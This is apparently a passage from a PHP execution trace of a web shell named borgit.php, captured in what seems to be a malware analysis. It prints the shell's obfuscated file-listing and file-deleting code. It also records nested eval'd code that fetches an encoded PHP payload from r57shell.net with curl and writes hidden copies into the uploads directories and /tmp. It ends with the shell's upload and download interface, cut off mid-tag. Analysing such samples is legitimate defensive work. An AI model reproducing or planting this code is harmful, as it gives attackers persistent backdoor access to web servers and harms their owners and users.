RKfBn; DV9kU: echo "\\x3c\\x74\\162\\x3e\\74\\x74\\144\\x3e\\x43\\165\\162\\x72\\145\\156\\164\\40\\106\\x69\\154\\x65\\40\\x3a\\40"; goto Ne_rp; Ne_rp: echo $filename; goto kfYnM; uApcr: $RootDir = $_SERVER["\\x44\\x4f\\x43\\x55\\115\\105\\116\\x54\\137\\122\\x4f\\x4f\\124"]; goto bloZz; RKfBn: } else { goto TMl06; TMl06: echo "\\74\\57\\x74\\141\\x62\\x6c\\x65\\76\\x3c\\142\\162\\x20\\x2f\\x3e\\x3c\\143\\x65\\156\\164\\145\\162\\76"; goto PPkHk; oOWfl: echo "\\x3c\\x2f\\164\\x61\\142\\x6c\\x65\\76\\x3c\\57\\x64\\x69\\166\\x3e"; goto HU0x7; ULzDB: echo "\\x3c\\x2f\\143\\x65\\156\\164\\145\\x72\\x3e"; goto VGAWt; GP3Ir: echo "\\x3c\\164\\162\\40\\143\\x6c\\x61\\163\\163\\75\\x22\\x66\\151\\x72\\x73\\164\\42\\x3e\\x3c\\x74\\x64\\x3e\\74\\57\\x74\\144\\76\\x3c\\164\\144\\x3e\\x3c\\57\\164\\x64\\76\\x3c\\164\\x64\\76\\x3c\\x2f\\164\\x64\\x3e\\x3c\\x74\\144\\76\\x3c\\57\\164\\144\\x3e\\74\\x2f\\x74\\x72\\x3e"; goto eUI_L; VGAWt: $scandir = scandir($path); goto BM0GO; eUI_L: foreach ($scandir as $file) { goto RDwb9; D820U: echo "\\74\\x74\\x72\\76\\74\\164\\x64\\x3e\\x3c\\x61\\x20\\150\\x72\\145\\146\\x3d\\x22\\x3f\\146\\x69\\x6c\\145\\x70\\141\\164\\150\\x3d{$path}\\57{$file}\\46\\160\\x61\\164\\x68\\x3d{$path}\\x22\\x3e{$file}\\74\\x2f\\141\\x3e\\74\\x2f\\164\\x64\\76\\74\\x74\\144\\76" . $size . "\\x3c\\57\\x74\\144\\x3e\\x3c\\164\\144\\76\\74\\141\\x20\\150\\162\\x65\\146\\x3d\\x22\\77\\160\\141\\164\\150\\x3d{$path}\\46\\x64\\145\\x6c\\x66\\151\\x6c\\145\\75{$path}\\x2f{$file}\\x26\\x6f\\x70\\x74\\151\\x6f\\x6e\\x3d\\144\\x65\\154\\145\\164\\145\\x22\\x3e\\104\\x65\\154\\145\\164\\x65\\74\\57\\x61\\x3e\\x3c\\57\\164\\144\\76\\74\\x2f\\164\\162\\x3e"; goto tr9x8; RDwb9: if (!is_file("{$path}\\x2f{$file}")) { continue; } goto PDq60; PDq60: $size = filesize("{$path}\\57{$file}") / 1024; goto P_4x4; yuXvv: if ($size >= 1024) { $size = round($size / 1024, 2) . "\\40\\115\\x42"; } else { $size = $size . "\\x20\\113\\102"; } goto D820U; P_4x4: $size = round($size, 3); goto yuXvv; tr9x8: } goto oOWfl; QTvs1: foreach ($scandir as $dir) { if (!is_dir("{$path}\\x2f{$dir}") || $dir == "\\56" || $dir == "\\x2e\\56") { continue; } echo "\\74\\164\\162\\76\\74\\x74\\144\\76\\x3c\\141\\x20\\x68\\162\\145\\146\\x3d\\42\\77\\160\\141\\x74\\x68\\75{$path}\\x2f{$dir}\\42\\76{$dir}\\74\\57\\141\\76\\x3c\\57\\164\\144\\x3e\\x3c\\x74\\144\\x3e\\104\\111\\x52\\x3c\\57\\164\\144\\x3e\\74\\x74\\144\\x3e\\156\\157\\x6e\\x65\\x3c\\57\\164\\x64\\76\\x3c\\57\\x74\\162\\76"; } goto GP3Ir; PPkHk: if (isset($_GET["\\x6f\\x70\\164\\151\\157\\x6e"]) && $_GET["\\x6f\\160\\164\\151\\157\\x6e"] == "\\144\\145\\154\\145\\x74\\x65") { if (unlink($_GET["\\x64\\x65\\154\\146\\151\\x6c\\x65"])) { echo "\\x3c\\x66\\x6f\\x6e\\164\\40\\143\\x6f\\x6c\\x6f\\x72\\x3d\\x22\\x67\\162\\145\\x65\\156\\42\\x3e\\x44\\145\\154\\145\\x74\\145\\40\\x46\\x69\\x6c\\x65\\40\\x44\\x6f\\x6e\\x65\\x2e\\x3c\\x2f\\x66\\x6f\\x6e\\164\\76\\x3c\\x62\\x72\\x20\\x2f\\x3e"; } else { echo "\\x3c\\146\\x6f\\x6e\\x74\\x20\\x63\\157\\154\\x6f\\x72\\75\\x22\\162\\145\\144\\x22\\x3e\\x44\\x65\\x6c\\x65\\164\\x65\\x20\\106\\x69\\154\\x65\\40\\105\\162\\x72\\x6f\\162\\x2e\\x3c\\x2f\\146\\x6f\\156\\164\\76\\74\\x62\\162\\x20\\x2f\\76"; } } goto ULzDB; BM0GO: echo "\\x3c\\144\\151\\x76\\x20\\x69\\144\\x3d\\42\\143\\x6f\\156\\164\\145\\156\\x74\\42\\76\\74\\164\\141\\142\\154\\145\\x20\\x77\\151\\x64\\x74\\150\\x3d\\x22\\x33\\70\\60\\x22\\x20\\x62\\157\\x72\\x64\\145\\162\\75\\42\\60\\42\\40\\143\\145\\x6c\\x6c\\x70\\141\\144\\144\\151\\x6e\\x67\\75\\x22\\x33\\42\\40\\143\\x65\\x6c\\x6c\\163\\160\\141\\x63\\x69\\156\\x67\\x3d\\x22\\x31\\x22\\x20\\x61\\154\\151\\147\\156\\75\\x22\\143\\x65\\x6e\\164\\x65\\x72\\42\\x3e\\x3c\\x74\\x72\\40\\x63\\x6c\\141\\x73\\x73\\75\\42\\x66\\151\\x72\\x73\\x74\\x22\\x3e\\x3c\\164\\144\\x3e\\116\\141\\155\\x65\\x3c\\57\\164\\144\\76\\x3c\\164\\144\\76\\123\\x69\\172\\x65\\x3c\\57\\x74\\x64\\x3e\\74\\x74\\x64\\x3e\\x4f\\160\\164\\151\\x6f\\x6e\\163\\x3c\\x2f\\x74\\144\\x3e\\x3c\\x2f\\164\\162\\x3e"; goto QTvs1; HU0x7: }' /var/www/html/uploads/borgit.php(4) : eval()'d code 1 0
4 13 0 0.003300 520752 function_exists 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 'wp_core_version_check'
4 13 1 0.003324 520792
4 13 R FALSE
4 14 0 0.003345 520752 wp_core_version_check 1 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 0
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $document_file = '/var/www/html/uploads/borgit.php'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $request_uri = '/uploads/borgit.php'
5 15 0 0.003404 520752 parse_url 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/uploads/borgit.php'
5 15 1 0.003425 521208
5 15 R ['path' => '/uploads/borgit.php']
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $parse_url = ['path' => '/uploads/borgit.php']
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $uri_path = '/uploads/borgit.php'
5 16 0 0.003480 521176 dirname 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/uploads/borgit.php'
5 16 1 0.003499 521256
5 16 R '/uploads'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $uri_path = '/uploads'
5 17 0 0.003533 521224 dirname 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/borgit.php'
5 17 1 0.003552 521320
5 17 R '/var/www/html/uploads'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $file_path = '/var/www/html/uploads'
5 18 0 0.003587 521288 str_replace 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 3 '/' '/' '/uploads'
5 18 1 0.003608 521424
5 18 R '/uploads'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $uri_path = '/uploads'
5 19 0 0.003642 521280 str_replace 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 3 '/uploads' '' '/var/www/html/uploads'
5 19 1 0.003663 521416
5 19 R '/var/www/html'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $document_root = '/var/www/html'
5 20 0 0.003699 521320 str_replace 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 3 'www.' '' 'localhost'
5 20 1 0.003719 521416
5 20 R 'localhost'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $hostname = 'localhost'
5 21 0 0.003753 521320 sys_get_temp_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 0
5 21 1 0.003772 521360
5 21 R '/tmp'
5 22 0 0.003789 521360 is_writable 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/tmp'
5 22 1 0.003815 521400
5 22 R TRUE
5 23 0 0.003833 521328 sys_get_temp_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 0
5 23 1 0.003850 521360
5 23 R '/tmp'
5 24 0 0.003869 521448 md5 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 'localhost_/var/www/html/uploads/borgit.php'
5 24 1 0.003888 521544
5 24 R '38856f658bc098be43a28aa428b7ae46'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $tmp_file = '/tmp/sess_38856f658bc098be43a28aa428b7ae46'
5 25 0 0.003929 521408 file_exists 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/tmp/sess_38856f658bc098be43a28aa428b7ae46'
5 25 1 0.003960 521448
5 25 R FALSE
5 26 0 0.003978 521408 function_exists 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 'curl_init'
5 26 1 0.003998 521448
5 26 R TRUE
5 27 0 0.004015 521408 curl_init 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 0
5 27 1 0.004048 522320
5 27 R resource(3) of type (curl)
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $ch = resource(3) of type (curl)
5 28 0 0.004086 522320 curl_setopt 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 3 resource(3) of type (curl) 10002 'http://r57shell.net/jquery.php?v=1.2&request=enable'
5 28 1 0.004110 522416
5 28 R TRUE
5 29 0 0.004128 522320 curl_setopt 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 3 resource(3) of type (curl) 19913 1
5 29 1 0.004148 522416
5 29 R TRUE
5 30 0 0.004166 522376 curl_setopt 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 3 resource(3) of type (curl) 10016 'localhost/uploads/borgit.php'
5 30 1 0.004188 522472
5 30 R TRUE
5 31 0 0.004204 522320 curl_exec 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 resource(3) of type (curl)
5 31 1 0.099288 526448
5 31 R '<?php\n$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\\x635PSdUoLikqSi3TU\\x43kuKTHQ\\x42\\x41Fr\\x41\\x41\\x3d\\x3d";\n$stt0 = "==g0asIRB8P1gY6TKSPVmtugK+Kpd8U7+L6/8HsAL4r1b/4fEQp6Mo/pOboYe3v8eAOmrieGTVQ+Z9my3W+L/I97Nrj3R25MlqBPK1e5FG0Lgu3Mb833oXUpXTczrdJsV/rgz8KxwM9XcIhzoainP2UlVzQ1giwmKVrF01czTnVVjQ1Uqq6RVrk6rZtmzpum3PqotZ3EqdvKAg033zaERXg8nRN+pQLnAcgz537v6i2W9r3duqknhF2VgsPIhF1NtAbW0ShDR0Fg6HHesQ9HNxcupQbcySkUHxvfoZbqYRyHNRKetlQ5PapmCig17sGJaor3Lk+tzdQyCw6vvEN5M+Squv+MGOy8FqsnzjJp67+'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $response = '<?php\n$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\\x635PSdUoLikqSi3TU\\x43kuKTHQ\\x42\\x41Fr\\x41\\x41\\x3d\\x3d";\n$stt0 = "==g0asIRB8P1gY6TKSPVmtugK+Kpd8U7+L6/8HsAL4r1b/4fEQp6Mo/pOboYe3v8eAOmrieGTVQ+Z9my3W+L/I97Nrj3R25MlqBPK1e5FG0Lgu3Mb833oXUpXTczrdJsV/rgz8KxwM9XcIhzoainP2UlVzQ1giwmKVrF01czTnVVjQ1Uqq6RVrk6rZtmzpum3PqotZ3EqdvKAg033zaERXg8nRN+pQLnAcgz537v6i2W9r3duqknhF2VgsPIhF1NtAbW0ShDR0Fg6HHesQ9HNxcupQbcySkUHxvfoZbqYRyHNRKetlQ5PapmCig17sGJaor3Lk+tzdQyCw6vvEN5M+Squv+MGOy8FqsnzjJp67+'
5 32 0 0.099410 526416 curl_close 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 resource(3) of type (curl)
5 32 1 0.099476 525560
5 32 R NULL
5 33 0 0.099495 525528 touch 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/tmp/sess_38856f658bc098be43a28aa428b7ae46'
5 33 1 0.099568 525568
5 33 R TRUE
5 34 0 0.099586 525528 file_put_contents 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 '/tmp/sess_38856f658bc098be43a28aa428b7ae46' '<?php\n$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\\x635PSdUoLikqSi3TU\\x43kuKTHQ\\x42\\x41Fr\\x41\\x41\\x3d\\x3d";\n$stt0 = "==g0asIRB8P1gY6TKSPVmtugK+Kpd8U7+L6/8HsAL4r1b/4fEQp6Mo/pOboYe3v8eAOmrieGTVQ+Z9my3W+L/I97Nrj3R25MlqBPK1e5FG0Lgu3Mb833oXUpXTczrdJsV/rgz8KxwM9XcIhzoainP2UlVzQ1giwmKVrF01czTnVVjQ1Uqq6RVrk6rZtmzpum3PqotZ3EqdvKAg033zaERXg8nRN+pQLnAcgz537v6i2W9r3duqknhF2VgsPIhF1NtAbW0ShDR0Fg6HHesQ9HNxcupQbcySkUHxvfoZbqYRyHNRKetlQ5PapmCig17sGJaor3Lk+tzdQyCw6vvEN5M+Squv+MGOy8FqsnzjJp67+'
5 34 1 0.099709 525712
5 34 R 3700
5 35 0 0.099729 525680 glob 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 '/var/www/html/*' 8192
5 35 1 0.099820 526168
5 35 R [0 => '/var/www/html/uploads']
5 36 0 0.099840 526064 array_filter 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 [0 => '/var/www/html/uploads']
5 36 1 0.099857 526472
5 36 R [0 => '/var/www/html/uploads']
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $dirs = [0 => '/var/www/html/uploads']
5 37 0 0.099889 526112 basename 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads'
5 37 1 0.099906 526176
5 37 R 'uploads'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $file_name = '/var/www/html/uploads/.uploads.php'
5 38 0 0.099934 526128 file_put_contents 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 '/var/www/html/uploads/.uploads.php' '<?php\n$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\\x635PSdUoLikqSi3TU\\x43kuKTHQ\\x42\\x41Fr\\x41\\x41\\x3d\\x3d";\n$stt0 = "==g0asIRB8P1gY6TKSPVmtugK+Kpd8U7+L6/8HsAL4r1b/4fEQp6Mo/pOboYe3v8eAOmrieGTVQ+Z9my3W+L/I97Nrj3R25MlqBPK1e5FG0Lgu3Mb833oXUpXTczrdJsV/rgz8KxwM9XcIhzoainP2UlVzQ1giwmKVrF01czTnVVjQ1Uqq6RVrk6rZtmzpum3PqotZ3EqdvKAg033zaERXg8nRN+pQLnAcgz537v6i2W9r3duqknhF2VgsPIhF1NtAbW0ShDR0Fg6HHesQ9HNxcupQbcySkUHxvfoZbqYRyHNRKetlQ5PapmCig17sGJaor3Lk+tzdQyCw6vvEN5M+Squv+MGOy8FqsnzjJp67+'
5 38 1 0.099996 526200
5 38 R 3700
5 39 0 0.100012 526176 glob 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 '/var/www/html/uploads/*' 8192
5 39 1 0.100041 526672
5 39 R [0 => '/var/www/html/uploads/data']
5 40 0 0.100059 526560 array_filter 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 [0 => '/var/www/html/uploads/data']
5 40 1 0.100075 526968
5 40 R [0 => '/var/www/html/uploads/data']
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $dirs = [0 => '/var/www/html/uploads/data']
5 41 0 0.100104 526560 preg_match 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 '#wp-content#' '/var/www/html/uploads/data'
5 41 1 0.100122 526624
5 41 R 0
5 42 0 0.100135 526616 basename 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 42 1 0.100151 526680
5 42 R 'data'
4 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $file_name = '/var/www/html/uploads/data/.data.php'
5 43 0 0.100177 526560 file_put_contents 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 '/var/www/html/uploads/data/.data.php' '<?php\n$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\\x635PSdUoLikqSi3TU\\x43kuKTHQ\\x42\\x41Fr\\x41\\x41\\x3d\\x3d";\n$stt0 = "==g0asIRB8P1gY6TKSPVmtugK+Kpd8U7+L6/8HsAL4r1b/4fEQp6Mo/pOboYe3v8eAOmrieGTVQ+Z9my3W+L/I97Nrj3R25MlqBPK1e5FG0Lgu3Mb833oXUpXTczrdJsV/rgz8KxwM9XcIhzoainP2UlVzQ1giwmKVrF01czTnVVjQ1Uqq6RVrk6rZtmzpum3PqotZ3EqdvKAg033zaERXg8nRN+pQLnAcgz537v6i2W9r3duqknhF2VgsPIhF1NtAbW0ShDR0Fg6HHesQ9HNxcupQbcySkUHxvfoZbqYRyHNRKetlQ5PapmCig17sGJaor3Lk+tzdQyCw6vvEN5M+Squv+MGOy8FqsnzjJp67+'
5 43 1 0.100237 526632
5 43 R 3700
4 14 1 0.100254 520872
4 44 0 0.100263 520872 getcwd 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 0
4 44 1 0.100279 520920
4 44 R '/var/www/html/uploads'
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $path = '/var/www/html/uploads'
4 45 0 0.100306 520920 str_replace 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 3 '\\' '/' '/var/www/html/uploads'
4 45 1 0.100323 521016
4 45 R '/var/www/html/uploads'
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $path = '/var/www/html/uploads'
4 46 0 0.100349 520920 explode 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 '/' '/var/www/html/uploads'
4 46 1 0.100365 521496
4 46 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $id = 0
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $a = TRUE
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $id = 1
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $id = 2
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $id = 3
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $id = 4
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $i++
4 47 0 0.100660 521424 scandir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads'
4 47 1 0.100689 522088
4 47 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '.uploads.php', 4 => 'borgit.php', 5 => 'data', 6 => 'prepend.php']
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '.uploads.php', 4 => 'borgit.php', 5 => 'data', 6 => 'prepend.php']
4 48 0 0.100733 522104 is_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.'
4 48 1 0.100751 522168
4 48 R TRUE
4 49 0 0.100765 522136 is_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/..'
4 49 1 0.100781 522184
4 49 R TRUE
4 50 0 0.100795 522144 is_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
4 50 1 0.100811 522184
4 50 R FALSE
4 51 0 0.100825 522152 is_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.uploads.php'
4 51 1 0.100841 522200
4 51 R FALSE
4 52 0 0.100860 522160 is_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/borgit.php'
4 52 1 0.100876 522200
4 52 R FALSE
4 53 0 0.100890 522152 is_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/data'
4 53 1 0.100905 522184
4 53 R TRUE
4 54 0 0.100919 522152 is_dir 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
4 54 1 0.100935 522200
4 54 R FALSE
4 55 0 0.100949 522144 is_file 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.'
4 55 1 0.100966 522168
4 55 R FALSE
4 56 0 0.100979 522136 is_file 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/..'
4 56 1 0.100995 522184
4 56 R FALSE
4 57 0 0.101008 522144 is_file 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
4 57 1 0.101023 522184
4 57 R TRUE
4 58 0 0.101037 522144 filesize 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
4 58 1 0.101051 522184
4 58 R 64
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 0.0625
4 59 0 0.101077 522088 round 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 0.0625 3
4 59 1 0.101092 522160
4 59 R 0.063
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 0.063
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = '0.063 KB'
4 60 0 0.101132 522192 is_file 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.uploads.php'
4 60 1 0.101148 522240
4 60 R TRUE
4 61 0 0.101161 522200 filesize 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/.uploads.php'
4 61 1 0.101176 522240
4 61 R 3700
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 3.61328125
4 62 0 0.101200 522096 round 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 3.61328125 3
4 62 1 0.101215 522168
4 62 R 3.613
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 3.613
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = '3.613 KB'
4 63 0 0.101253 522200 is_file 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/borgit.php'
4 63 1 0.101268 522240
4 63 R TRUE
4 64 0 0.101281 522200 filesize 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/borgit.php'
4 64 1 0.101294 522240
4 64 R 8368
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 8.171875
4 65 0 0.101319 522096 round 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 8.171875 3
4 65 1 0.101333 522168
4 65 R 8.172
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 8.172
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = '8.172 KB'
4 66 0 0.101372 522192 is_file 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/data'
4 66 1 0.101388 522224
4 66 R FALSE
4 67 0 0.101401 522192 is_file 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
4 67 1 0.101417 522240
4 67 R TRUE
4 68 0 0.101430 522200 filesize 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
4 68 1 0.101444 522240
4 68 R 57
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 0.0556640625
4 69 0 0.101469 522096 round 0 /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 2 0.0556640625 3
4 69 1 0.101483 522168
4 69 R 0.056
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = 0.056
3 A /var/www/html/uploads/borgit.php(4) : eval()'d code(1) : eval()'d code 2 $size = '0.056 KB'
3 12 1 0.101523 522136
2 7 1 0.101535 479448
1 3 1 0.101542 477872
0.101577 397120
TRACE END [2023-02-12 23:26:11.470899]
Generated HTML code
<html><head></head><body><table align="center" width="400" border="0" cellspacing="1" cellpadding="3"><tbody><tr><td>PathNow: <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST" action="?path=/var/www/html"><input name="up_file" type="file"><input type="submit" value="up File"></form></td></tr><tr><td><form method="POST" action="?path=/var/www/html"><span>Url: </span><input type="text" name="url" value=""><input type="hidden" name="path" value="/var/www/html"><input type="submit" value="Download"></form></td></tr></tbody></table><br><center></center><div id="content"><table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"><td>Name</td><td>Size</td><td>Options</td></tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr><td><a href="?filepath=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td>0 KB</td><td><a 